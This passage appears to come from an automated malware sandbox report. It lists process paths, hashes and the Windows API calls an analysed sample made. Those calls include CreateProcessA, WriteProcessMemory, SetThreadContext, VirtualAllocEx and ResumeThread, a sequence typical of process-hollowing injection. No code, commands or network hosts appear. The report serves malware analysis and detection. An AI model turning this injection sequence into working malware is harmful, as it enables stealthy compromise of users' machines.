Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
Imagebase: 0x280000
File size: 45160 bytes
MD5 hash: B490A24A9328FD89155F075FA26C0DEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

                                                                                            General

Start time: 15:00:28
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
Imagebase: 0x120000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272963A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272963A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0272E47E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027299D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 027299D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 0272980E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetThreadContext.KERNELBASE(?,00000000), ref: 0272980E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02729B5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02729B5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302197764.0000000000B3D000.00000040.00000001.sdmp, Offset: 00B3D000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21a74234ee8e880749e6a12a5aadde4e40c06836398c90a688ed256f7accc005
                                                                                              • Instruction ID: f82ab2ddac87aa6d1a60e19c925a33cab3480fad78152df47246431f3f4734ea
                                                                                              • Opcode Fuzzy Hash: 21a74234ee8e880749e6a12a5aadde4e40c06836398c90a688ed256f7accc005
                                                                                              • Instruction Fuzzy Hash: A7C125B1E006298BCB14DFA9CA846EDFBF1FF48304F258569D458EB205E734995ACF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ac8feedac27e5aecbc3caa1c9a4fbefff39503c2dc95aa3d1a8eaf33de29fb3
                                                                                              • Instruction ID: 799662a3e37a3065366512e318151acdce91761e100b522bae197f78ccdda0f1
                                                                                              • Opcode Fuzzy Hash: 8ac8feedac27e5aecbc3caa1c9a4fbefff39503c2dc95aa3d1a8eaf33de29fb3
                                                                                              • Instruction Fuzzy Hash: 53715A71A056048FD708EFBAF95068A7BE3EFD8305F04C8AAD1059B268FF7159058F80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.302924576.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 85cbe10c5b6ceb19f78c45037574124a0cf6cb50c88dfe1b0983482a0ea056dd
                                                                                              • Instruction ID: 01209e5b803ec582cb3342dfd60d7c43f4e67d3eca783a5dd7153e3a62d41edf
                                                                                              • Opcode Fuzzy Hash: 85cbe10c5b6ceb19f78c45037574124a0cf6cb50c88dfe1b0983482a0ea056dd
                                                                                              • Instruction Fuzzy Hash: 1D614871A056048FD708EFAAF95068ABBE7EFD8304F04C8A9D1089B228FF7159058F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517332269.00000000016B0000.00000040.00000010.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517332269.00000000016B0000.00000040.00000010.sdmp, Offset: 016B0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C10
                                                                                              • GetCurrentThread.KERNEL32 ref: 01826C4D
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C8A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 01826CE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C10
                                                                                              • GetCurrentThread.KERNEL32 ref: 01826C4D
                                                                                              • GetCurrentProcess.KERNEL32 ref: 01826C8A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 01826CE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01825302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01825302
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 01827D59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,01697BD9,00000800), ref: 01697C6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01826E5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01826E5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0182BED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,00000000,?,01697BD9,00000800), ref: 01697C6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 0182BED2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0646E1FA), ref: 0646E2E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.520568232.0000000006460000.00000040.00000010.sdmp, Offset: 06460000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: GlobalMemoryStatus
                                                                                              • String ID:
                                                                                              • API String ID: 1890195054-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01824276
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0169B585
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 01824276
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517443469.0000000001820000.00000040.00000001.sdmp, Offset: 01820000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 0169B585
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.517255186.0000000001690000.00000040.00000010.sdmp, Offset: 01690000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions